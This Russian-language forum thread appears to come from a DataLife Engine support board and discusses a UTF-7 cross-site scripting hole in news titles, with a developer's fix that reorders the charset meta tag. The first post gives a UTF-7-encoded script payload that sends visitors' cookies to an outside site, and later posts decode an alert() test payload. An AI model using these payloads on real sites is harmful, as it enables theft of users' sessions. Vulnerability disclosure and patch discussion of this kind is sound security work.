Уязвимость (кража куков)

[WWW.ZEOS.IN 1 161]

Уязвимы те, у кого в main.tpl первой строчкой НЕ идёт: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

Заходим на такой сайт и пишем новость с названием:

+ADw-/title+AD4APA-meta http-equiv+AD0AIg-Content-Type+ACI- content+AD0AIg-text/html+ADs- charset+AD0-utf-7+ACIAPg-

В короткой новости пишем, что угодно, а в полной пишем:

+ACIAPgA8-script+AD4-document.location.href+AD0-'http://www.site.ru/script.php?cookie+AD0-'+-document.cookie+-''+ADw-/script+AD4APAAi-

(код в одну строку)

В итоге куки пользователя, который просмотрит страницу, улетят на другой сайт

[celsoft 6 039]

Не сработало ни в одном браузере. Но даже если бы и сработало украсть куки скрипта через JS невозможно, т.к. DLE использует безопасный режим куков, которые недоступны при обращении к ним через JS. В данном случае я никаких проблем не вижу.

Но есть подозрение что уязвимости может быть подвержен браузер IE6, проверить не могу, т.к. не нет в наличии столь старого браузера.

А вообще если проблема и имеет место быть, для столь старых браузеров, чего я проверить не могу, то решение простое в файле

engine/engine.php найдите

<title>{$metatags['title']}</title>

<meta http-equiv="Content-Type" content="text/html; charset={$config['charset']}" />

и просто поменяйте их местами, чтобы было

<meta http-equiv="Content-Type" content="text/html; charset={$config['charset']}" />

<title>{$metatags['title']}</title>

Все.

[WWW.ZEOS.IN 1 161]

Странно, у меня все браузеры новые и во всех, если зайти сюда: Ссылка выскакивает сообщение "Проверка"

Во всех браузерах стоит авто-определение кодировки.

Вот этот код:

+ADw-/title+AD4APA-meta http-equiv+AD0AIg-Content-Type+ACI- content+AD0AIg-text/html+ADs- charset+AD0-utf-7+ACIAPg-

означает:

</title><meta http-equiv="Content-Type" content="text/html; charset=utf-7">

Соответственно любой браузер у меня обрабатывает стараницу в кодировке UTF-7 и в HTML коде такое:

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title></title><meta http-equiv="Content-Type" content="text/html; charset=utf-7"> &raquo; DLE</title>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />

<meta name="description" content="ÏÐÎÁÓÉ ÒÓÒ"><script>alert("Проверка")<script><"" />

<meta name="keywords" content="OOOACIAPgA8scriptAD4alertACIEHwRABD4EMgQ1BEAEOgQwACIADwscriptAD4APAAi, I?IAOE" />

А вот этот код:

+ACIAPgA8-script+AD4-alert(+ACIEHwRABD4EMgQ1BEAEOgQwACI-)+ADw-/script+AD4APAAi-

это:

"><script>alert("Проверка")</script><"

А если это Журналист и он может редактировать новость в админке, то он может даже так сделать:

<meta name="description" content=""><meta http-equiv="Content-Type" content="text/html; charset=utf-7"><"" />

<meta name="keywords" content=""><meta http-equiv="Content-Type" content="text html; charset=utf-7"><"" />

[flo.mAster 7]

Не сработало ни в одном браузере. Но даже если бы и сработало украсть куки скрипта через JS невозможно, т.к. DLE использует безопасный режим куков, которые недоступны при обращении к ним через JS. В данном случае я никаких проблем не вижу.

Но есть подозрение что уязвимости может быть подвержен браузер IE6, проверить не могу, т.к. не нет в наличии столь старого браузера.

А вообще если проблема и имеет место быть, для столь старых браузеров, чего я проверить не могу, то решение простое в файле

engine/engine.php найдите

<title>{$metatags['title']}</title>

<meta http-equiv="Content-Type" content="text/html; charset={$config['charset']}" />

и просто поменяйте их местами, чтобы было

<meta http-equiv="Content-Type" content="text/html; charset={$config['charset']}" />

<title>{$metatags['title']}</title>

Все.

Можно передать dle_login_hash

[celsoft 6 039]

Странно, у меня все браузеры новые и во всех, если зайти сюда: Ссылка выскакивает сообщение "Проверка"

Зашел и ни один браузер ничего не вывел. У меня что браузеры не такие? Во всех браузерах стоит автоопределение. Может у вас как раз utf-7 принудительно установлено?

А если это Журналист и он может редактировать новость в админке, то он может даже так сделать:

<meta name="description" content=""><meta http-equiv="Content-Type" content="text/html; charset=utf-7"><"" />

<meta name="keywords" content=""><meta http-equiv="Content-Type" content="text html; charset=utf-7"><"" />

кодировку сайта можно задать только одним тегом, браузеры воспринимают только самое первое определение, все остальные браузерами игнорируются, хоть миллион раз их пишите. И подобный текст ни один браузер не обработает

Вот этот код:

+ADw-/title+AD4APA-meta http-equiv+AD0AIg-Content-Type+ACI- content+AD0AIg-text/html+ADs- charset+AD0-utf-7+ACIAPg-

означает:

</title><meta http-equiv="Content-Type" content="text/html; charset=utf-7">

Соответственно любой браузер у меня обрабатывает стараницу в кодировке UTF-7

Чтобы этот код что то означал, нужно чтобы браузер изначально посчитал страницу в кодировке UTF-7, т.к. +ADw-/ и прочее может работать исключительно в кодировке utf-7

[WWW.ZEOS.IN 1 161]

Не знаю даже как и быть

Может это из-за этого:

Снять галочки не могу

Попробовал удалить все шрифты

и всё равно выполняется UTF-7 когда пишу такой код +ACIAPgA...

P.S. Microsoft Windows XP Professional (Версия 2002, Service Pack 2)

[celsoft 6 039]

WWW.ZEOS.IN,

Нужно больше статистических данных по этому вопросу, у меня Windows 7 и я не вижу проблем ни в одном браузере. Не удаляйте пока новость по ссылке, завтра я еще попробую в офисе с компьютера на windows xp

[WWW.ZEOS.IN 1 161]

Спасибо

[celsoft 6 039]

Проверил на XP ничего не сработало Даже незнаю почему это у вас срабатывает

[WWW.ZEOS.IN 1 161]

У меня срабатывает на двух компьютерах из трёх

Буду разбираться как это можно выключить в системе